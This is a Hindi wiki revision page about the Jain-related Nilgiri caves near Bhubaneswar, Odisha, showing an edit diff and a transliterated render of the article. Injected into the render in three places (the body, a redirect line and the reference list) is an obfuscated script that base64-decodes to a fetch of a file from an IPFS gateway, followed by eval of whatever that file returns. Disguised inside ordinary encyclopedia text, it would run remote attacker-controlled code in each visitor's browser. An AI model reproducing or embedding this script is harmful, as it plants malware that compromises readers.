Difference between revisions of "नीलगिरि गुफ़ाएँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''नीलगिरि गुफ़ाएँ''' [[भुवनेश्वर]], [[उड़ीसा]] से चार-पाँच मील की दूरी पर स्थित हैं। ये गुफ़ाएँ [[जैन धर्म]] से सम्बन्धित हैं। माना जाता है कि इन गुफ़ाओं का निर्माण तीसरी शती ई.पू. में हुआ था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=505|url=}}</ref>
+
'''नीलगिरि गुफ़ाएँ''' [[भुवनेश्वर]], [[उड़ीसा]] से चार-पाँच मील की दूरी पर स्थित हैं। ये गुफ़ाएँ [[जैन धर्म]] से सम्बन्धित हैं। माना जाता है कि इन गुफ़ाओं का निर्माण तीसरी शती ई. पू. में हुआ था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=505|url=}}</ref>
 
{{tocright}}
 
{{tocright}}
====गुफ़ा समूह====
+
==गुफ़ा समूह==
नीलगिरि गुफाओं के पास घना वन्य प्रदेश है। नीलगिरि, [[उदयगिरि और खण्डगिरि गुफ़ाएँ|खंडगिरि और उदयगिरि]] नामक गुहा समूह में 66 गुफाएँ हैं, जो दो पहाड़ियों पर स्थित हैं। उदयगिरि व खंडगिरि में सब मिलाकर 19 गुफ़ाएँ हैं और उन्हीं के निकटवर्ती नीलगिरि नामक पहाड़ी में और भी कई गुफ़ाएँ देखने को मिलती हैं। इनमें [[रानीगुफ़ा]] के अतिरिक्त मंचपुरी और वैकुंठपुरी नाम की गुफ़ाएँ भी दर्शनीय हैं। इन गुफ़ाओं के [[शिलालेख|शिलालेखों]] तथा कलाकृतियों के आधार पर [[कलिंग]] नरेश [[खारवेल]] व उसके समीपवर्ती काल की पुष्टि होती हैं।
+
नीलगिरि गुफाओं के पास घना वन्य प्रदेश है। 'नीलगिरि', [[उदयगिरि और खण्डगिरि गुफ़ाएँ|'खंडगिरि' और 'उदयगिरि']] नामक गुहासमूह में 66 गुफाएँ हैं, जो दो पहाड़ियों पर स्थित हैं। उदयगिरि व खण्डगिरि में सब मिलाकर 19 गुफ़ाएँ हैं और उन्हीं के निकटवर्ती नीलगिरि नामक पहाड़ी में और भी कई गुफ़ाएँ देखने को मिलती हैं। इनमें '[[रानीगुफ़ा]]' के अतिरिक्त 'मंचपुरी' और 'वैकुंठपुरी' नाम की गुफ़ाएँ भी दर्शनीय हैं। इन गुफ़ाओं के [[शिलालेख|शिलालेखों]] तथा कलाकृतियों के आधार पर [[कलिंग]] [[खारवेल|नरेश खारवेल]] व उसके समीपवर्ती काल की पुष्टि होती हैं।
====जैन धार्मिक स्थल====
+
==जैन धार्मिक स्थल==
खंडगिरि की नवमुनि नामक गुफ़ा में दसवीं शती का एक शिलालेख है, जिसमें [[जैन]] मुनि शुभचन्द्र का नाम आया है। इस कारण यह प्रतीत होता है कि यह स्थान ई. पूर्व द्वितीय शती से दसवीं शती तक [[जैन धर्म]] का एक सुदृढ़ और प्रमुख केन्द्र रहा था।
+
खंडगिरि की 'नवमुनि' नामक गुफ़ा में दसवीं शती का एक [[शिलालेख]] है, जिसमें जैन मुनि 'शुभचन्द्र' का नाम आया है। इस कारण यह प्रतीत होता है कि यह स्थान ई. पूर्व द्वितीय शती से दसवीं शती तक [[जैन धर्म]] का एक सुदृढ़ और प्रमुख केन्द्र रहा था।
 +
 
  
 
{{seealso|उदयगिरि और खण्डगिरि गुफ़ाएँ}}
 
{{seealso|उदयगिरि और खण्डगिरि गुफ़ाएँ}}
Line 13: Line 14:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{उड़ीसा के पर्यटन स्थल}}
 
{{उड़ीसा के पर्यटन स्थल}}
[[Category:उड़ीसा राज्य]][[Category:उड़ीसा राज्य के ऐतिहासिक स्थान]][[Category:इतिहास कोश]][[Category:उड़ीसा राज्य के पर्यटन स्थल]][[Category:पर्यटन कोश]]
+
[[Category:उड़ीसा राज्य]][[Category:उड़ीसा राज्य के ऐतिहासिक स्थान]][[Category:इतिहास कोश]][[Category:उड़ीसा राज्य के पर्यटन स्थल]][[Category:ऐतिहासिक स्थल]][[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 14:00, 10 January 2015

nilagiri gufaean bhuvaneshvar, u disa se char-paanch mil ki doori par sthit haian. ye gufaean jain dharm se sambandhit haian. mana jata hai ki in gufaoan ka nirman tisari shati ee. poo. mean hua tha.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gufa samooh

nilagiri guphaoan ke pas ghana vany pradesh hai. 'nilagiri', 'khandagiri' aur 'udayagiri' namak guhasamooh mean 66 guphaean haian, jo do paha diyoan par sthit haian. udayagiri v khandagiri mean sab milakar 19 gufaean haian aur unhian ke nikatavarti nilagiri namak paha di mean aur bhi kee gufaean dekhane ko milati haian. inamean 'ranigufa' ke atirikt 'manchapuri' aur 'vaikuanthapuri' nam ki gufaean bhi darshaniy haian. in gufaoan ke shilalekhoan tatha kalakritiyoan ke adhar par kaliang naresh kharavel v usake samipavarti kal ki pushti hoti haian.

jain dharmik sthal

khandagiri ki 'navamuni' namak gufa mean dasavian shati ka ek shilalekh hai, jisamean jain muni 'shubhachandr' ka nam aya hai. is karan yah pratit hota hai ki yah sthan ee. poorv dvitiy shati se dasavian shati tak jain dharm ka ek sudridh aur pramukh kendr raha tha.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 505 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh